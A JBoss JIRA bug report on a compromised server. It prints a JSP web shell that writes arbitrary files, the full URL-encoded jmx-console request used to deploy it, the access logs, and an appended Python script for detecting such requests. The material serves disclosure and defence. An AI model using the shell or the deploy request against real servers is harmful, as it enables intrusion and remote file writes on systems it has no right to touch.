[
https://issues.jboss.org/browse/JBAS-9535?page=com.atlassian.jira.plugin....
]
Mike Hansen updated JBAS-9535:
------------------------------
Description:
I noticed a new deployment called myname.war with index.jsp which had the following
inside:
<%
if(request.getParameter("f")!=null)
(new java.io.FileOutputStream(application.getRealPath("\\") +
request.getParameter("f"))).write(request.getParameter("t").getBytes()
);
%>
mynameok
I looked into my web server logs and found the following entry:
ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 401 -
I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've
seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but
they've been unsuccessful so far.)
Here is the complete log of the exploit as recorded by the webserver:
access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET
/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET
/web-console/dtree.js HTTP/1.0" 302 -
"http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET
/jmx-console/jboss.css HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET
/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:10.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET
/invoker/JMXInvokerServlet HTTP/1.0" 200 3365
"http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT
6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 302 - "-" "-"
access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp
HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST
/invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-"
"Java/1.6.0_10-rc2"
access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp
HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
ssl_access_log.1:10.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 401 -
ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 10.101.48.70 TLSv1 RC4-MD5 "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" -
was:
I noticed a new deployment called myname.war with index.jsp which had the following
inside:
<%
if(request.getParameter("f")!=null)
(new java.io.FileOutputStream(application.getRealPath("\\") +
request.getParameter("f"))).write(request.getParameter("t").getBytes()
);
%>
mynameok
I looked into my web server logs and found the following entry:
ssl_access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 401 -
I double-checked our server and we had implemented the fixes for CVE-2010-0738. (We've
seen attempts by the JBoss worm trying to install the kisses.tar.gz exploit, but
they've been unsuccessful so far.)
Here is the complete log of the exploit as recorded by the webserver:
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:27 -0600] "GET
/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET
/web-console/dtree.js HTTP/1.0" 302 -
"http://153.90.162.14/web-console/dtree.js" "Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:29 -0600] "GET
/jmx-console/jboss.css HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/jboss.css" "Mozilla/5.0 (Windows NT 6.1;
WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:30 -0600] "GET
/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -
"http://153.90.162.14/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [14/Apr/2013:20:10:32 -0600] "GET
/invoker/JMXInvokerServlet HTTP/1.0" 200 3365
"http://153.90.162.14/invoker/JMXInvokerServlet" "Mozilla/5.0 (Windows NT
6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:04 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 302 - "-" "-"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:14 -0600] "GET /myname/index.jsp
HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:15 -0600] "POST
/invoker/JMXInvokerServlet HTTP/1.1" 200 73 "-"
"Java/1.6.0_10-rc2"
access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:17 -0600] "GET /myname/index.jsp
HTTP/1.0" 404 999 "http://153.90.162.14/myname/index.jsp" "Mozilla/5.0
(Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0"
ssl_access_log.1:211.101.48.70 - - [16/Apr/2013:19:09:13 -0600] "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" 401 -
ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 211.101.48.70 TLSv1 RC4-MD5 "HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=myname.war&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%5c%5c%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3emynameok&argType=boolean&arg4=True
HTTP/1.0" -
Exploit found in JBoss JMX Console via
HtmlAdaptor?action=invokeOpByName
------------------------------------------------------------------------
Key: JBAS-9535
URL:
https://issues.jboss.org/browse/JBAS-9535
Project: Application Server 3 4 5 and 6
Issue Type: Bug
Security Level: Public(Everyone can see)
Components: JMX
Affects Versions: JBossAS-5.1.0.GA
Environment: CentOS 5.4
Reporter: Mike Hansen
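Added example (not part of the original report and not JBoss code): one way to locate requests like the HEAD entries in the access log above is to percent-decode each request's query string and match the invokeOpByName call to the DeploymentFileRepository store operation. The sample lines, the documentation-range addresses and the sample.war name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample input modelled on the log format in the report above
# (documentation-range addresses, harmless placeholder content in arg3).
STORE_QUERY = (
    "action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository"
    "&methodName=store&argType=java.lang.String&arg0=sample.war"
    "&argType=java.lang.String&arg1=index&argType=java.lang.String&arg2=.jsp"
    "&argType=java.lang.String&arg3=%3c%25out.print(1)%3b%25%3eok"
    "&argType=boolean&arg4=True"
)
SAMPLE_LOG = [
    'access_log.1:192.0.2.10 - - [14/Apr/2013:20:10:27 -0600] "GET '
    '/jmx-console/HtmlAdaptor?action=displayMBeans&filter=jboss.admin HTTP/1.0" 302 -',
    'access_log.1:192.0.2.10 - - [16/Apr/2013:19:09:04 -0600] "HEAD '
    '/jmx-console/HtmlAdaptor?' + STORE_QUERY + ' HTTP/1.0" 302 - "-" "-"',
    '198.51.100.7 - - [16/Apr/2013:19:09:14 -0600] "GET /sample/index.jsp HTTP/1.0" 404 999',
    'ssl_request_log.1:[16/Apr/2013:19:09:13 -0600] 192.0.2.10 TLSv1 RC4-MD5 "HEAD / HTTP/1.0" -',
]

# Common/combined log format, with an optional "file:" prefix as left by grep.
LINE_RE = re.compile(
    r'^(?:[\w.\-]+:)?(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_store_calls(lines):
    """Return one record per request that invokes DeploymentFileRepository.store."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # other formats (e.g. ssl_request_log) are skipped here
        url = urlsplit(m["target"])
        if not url.path.endswith("/HtmlAdaptor"):
            continue
        # parse_qsl percent-decodes values; repeated keys (argType) overwrite.
        q = dict(parse_qsl(url.query, keep_blank_values=True))
        if (q.get("action") != "invokeOpByName" or q.get("methodName") != "store"
                or "DeploymentFileRepository" not in q.get("name", "")):
            continue
        hits.append({
            "src": m["src"], "time": m["time"],
            "method": m["method"], "status": m["status"],
            "deployment": q.get("arg0", ""),                # WAR directory created
            "file": q.get("arg1", "") + q.get("arg2", ""),  # name + extension
            "jsp_scriptlet": "<%" in q.get("arg3", ""),     # content carries JSP code
        })
    return hits
```

Each record keeps the HTTP method and status so an analyst can see which verbs reached the adaptor and how the server answered.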